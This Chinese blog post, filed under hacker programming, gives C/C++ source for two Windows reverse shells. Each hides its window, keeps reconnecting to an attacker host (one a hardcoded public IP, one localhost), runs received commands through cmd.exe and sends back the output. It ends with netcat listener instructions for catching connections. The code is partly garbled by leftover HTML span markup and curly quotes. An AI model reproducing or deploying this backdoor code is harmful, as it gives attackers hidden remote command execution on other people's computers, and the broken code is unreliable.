C/C++匿名管道反弹CMDShell

发表于 2018-06-11 更新于 2022-12-21 分类于 C++ 黑客编程本文字数： 9.2k

#pragma comment(lib,"ws2_32.lib")
#ifdef _MSC_VER
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#endif

#include <winsock2.h>
#include <windows.h>
int main(int argc, char **argv)
{
    char *messages = “======================== Connect successful !========================\n“;
    WSADATA WSAData;
    SOCKET sock; //创建套接字
    SOCKADDR_IN addr_in;
    char buf[1024]; //buf作为socket接收数据的缓冲区
    memset(buf, 0, 1024); //清空缓冲区

    WSAStartup(MAKEWORD(2, 2), &WSAData); //初始化ws2

    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(80); //反向连接的远端主机端口
    addr_in.sin_addr.S_un.S_addr = inet_addr(“59.110.167.239“); //远端IP

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
</span><span style="color: #0000ff;">while</span> (WSAConnect(sock, (<span style="color: #0000ff;">struct</span> sockaddr *)&amp;addr_in, <span style="color: #0000ff;">sizeof</span>(addr_in), NULL, NULL, NULL, NULL) == SOCKET_ERROR) <span style="color: #008000;">//</span><span style="color: #008000;">连接客户主机</span>

    {
        Sleep(5000); //连接失败，停顿5s，再试
        continue;
    }
send(sock, messages, strlen(messages), </span><span style="color: #800080;">0</span>); <span style="color: #008000;">//</span><span style="color: #008000;">发送success信息</span>

<span style="color: #0000ff;">char</span> buffer[<span style="color: #800080;">2048</span>] = { <span style="color: #800080;">0</span> };<span style="color: #008000;">//</span><span style="color: #008000;">管道输出的数据</span>

<span style="color: #0000ff;">for</span> (<span style="color: #0000ff;">char</span> cmdline[<span style="color: #800080;">270</span>];; memset(cmdline, <span style="color: #800080;">0</span>, <span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(cmdline))){
    SECURITY_ATTRIBUTES sa;</span><span style="color: #008000;">//</span><span style="color: #008000;">创建匿名管道用于取得cmd的命令输出</span>

        HANDLE hRead, hWrite;
        sa.nLength = sizeof(SECURITY_ATTRIBUTES);
        sa.lpSecurityDescriptor = NULL;
        sa.bInheritHandle = TRUE;
    CreatePipe(</span>&amp;hRead, &amp;hWrite, &amp;sa, <span style="color: #800080;">0</span>); <span style="color: #008000;">//</span><span style="color: #008000;">创建管道</span>


        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        si.cb = sizeof(STARTUPINFO);
        GetStartupInfo(&si); //STARTUPINFO 结构
        si.hStdError = hWrite;
        si.hStdOutput = hWrite;
        si.wShowWindow = SW_HIDE; //隐藏窗口
        si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

    GetSystemDirectory(cmdline, MAX_PATH </span>+ <span style="color: #800080;">1</span>); <span style="color: #008000;">//</span><span style="color: #008000;">获得系统路径</span>
    strcat(cmdline, <span style="color: #800000;">"</span><span style="color: #800000;">//cmd.exe /c</span><span style="color: #800000;">"</span>); <span style="color: #008000;">//</span><span style="color: #008000;">路径+/cmd.exe</span>

    <span style="color: #0000ff;">int</span> len = recv(sock, buf, <span style="color: #800080;">1024</span><span style="color: #000000;">, NULL);
    </span><span style="color: #0000ff;">if</span> (len == SOCKET_ERROR) exit(<span style="color: #800080;">0</span>); <span style="color: #008000;">//</span><span style="color: #008000;">如果客户端断开连接，则自动退出程序</span>


        strncat(cmdline, buf, strlen(buf)); //把命令参数复制到cmdline
        CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi); //创建进程

        CloseHandle(hWrite);

    </span><span style="color: #0000ff;">for</span> (DWORD bytesRead; ReadFile(hRead, buffer, <span style="color: #800080;">2048</span>, &amp;bytesRead, NULL); <span style="color: #008000;">//</span><span style="color: #008000;">循环读取管道中数据并发送，直到管道中没有数据为止</span>
        memset(buffer, <span style="color: #800080;">0</span>, <span style="color: #800080;">2048</span><span style="color: #000000;">)){
        send(sock, buffer, strlen(buffer), </span><span style="color: #800080;">0</span><span style="color: #000000;">);
    }
}
</span><span style="color: #0000ff;">return</span> <span style="color: #800080;">0</span><span style="color: #000000;">;

}

#include <Windows.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")

HANDLE g_hinputPipe, g_houtputPipe;
HANDLE g_hThread;
DWORD g_dwThreadId;
const unsigned short PORT = 4900;
const char * REMOTE_ADDR = “127.0.0.1“;
const unsigned int MAXSTR = 255;
//收发信息
bool sendData(SOCKET sSock, char cmdline, const char sockData)
{
    ZeroMemory(cmdline, MAXSTR);
    SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;
    while (!CreatePipe(&g_houtputPipe, &g_hinputPipe, &sa, 0))
    {
        Sleep(1000);
    }
    Sleep(200);
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    GetStartupInfo(&si);
    si.hStdError = g_hinputPipe;
    si.hStdOutput = g_hinputPipe;
    si.wShowWindow = SW_HIDE;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    GetSystemDirectory(cmdline, MAXSTR);
    strcat_s(cmdline, MAXSTR, “\cmd.exe /c “);
    strcat_s(cmdline, MAXSTR, sockData);
    while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))
    {
        Sleep(1000);
    }
    WaitForSingleObject(pi.hProcess, 10000);
    return true;
}
//被控端管道信息回传监控
DWORD WINAPI WatchData(LPVOID lprarm)
{
    unsigned int g_Ret = 0;
    DWORD dwTotalAvail = 0;
    DWORD realReadLen = 0;
    char readBuffer[4096] = “\0“;
    SOCKET sSock = (SOCKET)lprarm;
    while (true)
    {
        g_Ret = PeekNamedPipe(g_houtputPipe, NULL, 0, NULL, &dwTotalAvail, NULL);
        if (g_Ret && dwTotalAvail > 0)
        {
            Sleep(300);
            g_Ret = ReadFile(g_houtputPipe, readBuffer, 4096, &realReadLen, NULL);
            if (g_Ret && realReadLen > 0)
            {
                Sleep(200);
                strcat_s(readBuffer, 4096, “\r\nCMD >“);
                send(sSock, readBuffer, strlen(readBuffer), 0);
                ZeroMemory(readBuffer, 4096);
            }
        }
    }
    return 0;
}
//主函数
int WINAPI WinMain(In HINSTANCE hInstance, In_opt HINSTANCE hPrevInstance, In LPSTR lpCmdLine, In int nShowCmd)
{
    char sendError[30] = “[] Send Error !\r\n\r\n“;
    char cmdline[MAXSTR] = “\0“;
    char sockData[MAXSTR] = “\0“;
    int sockDataLen = 0;
    SOCKET sSock;
    sockaddr_in sockAddr;
    WSADATA wsd;
    if (WSAStartup(MAKEWORD(2, 2), &wsd)) return 0;
    if ((sSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return 0;
    sockAddr.sin_addr.S_un.S_addr = inet_addr(REMOTE_ADDR);
    sockAddr.sin_family = AF_INET;
    sockAddr.sin_port = htons(PORT);
    while (connect(sSock, (sockaddr)&sockAddr, sizeof(sockAddr)) == SOCKET_ERROR)
    {
        Sleep(2000);
        continue;
    }
g_hThread </span>= CreateThread(NULL, <span style="color: #800080;">0</span>, WatchData, LPVOID(sSock), <span style="color: #800080;">0</span>, &amp;<span style="color: #000000;">g_dwThreadId);
</span><span style="color: #0000ff;">while</span> (<span style="color: #0000ff;">true</span><span style="color: #000000;">)
{
    </span><span style="color: #0000ff;">while</span> ((sockDataLen = recv(sSock, sockData, MAXSTR, <span style="color: #800080;">0</span>)) ==<span style="color: #000000;"> SOCKET_ERROR)
    {
        Sleep(</span><span style="color: #800080;">1000</span><span style="color: #000000;">);
    }
    </span><span style="color: #0000ff;">if</span> (!<span style="color: #000000;">sendData(sSock, cmdline, sockData))
    {
        send(sSock, sendError, strlen(sendError), </span><span style="color: #800080;">0</span><span style="color: #000000;">);
    }
    ZeroMemory(sockData, MAXSTR);
}

WaitForSingleObject(g_hThread, INFINITE);
CloseHandle(g_hinputPipe);
CloseHandle(g_houtputPipe);
closesocket(sSock);
WSACleanup();
ExitProcess(</span><span style="color: #800080;">0</span><span style="color: #000000;">);
</span><span style="color: #0000ff;">return</span> <span style="color: #800080;">0</span><span style="color: #000000;">;

}

下载NC https://eternallybored.org/misc/netcat/ nc执行命令：nc命令： -l -v -p [端口] 等待上线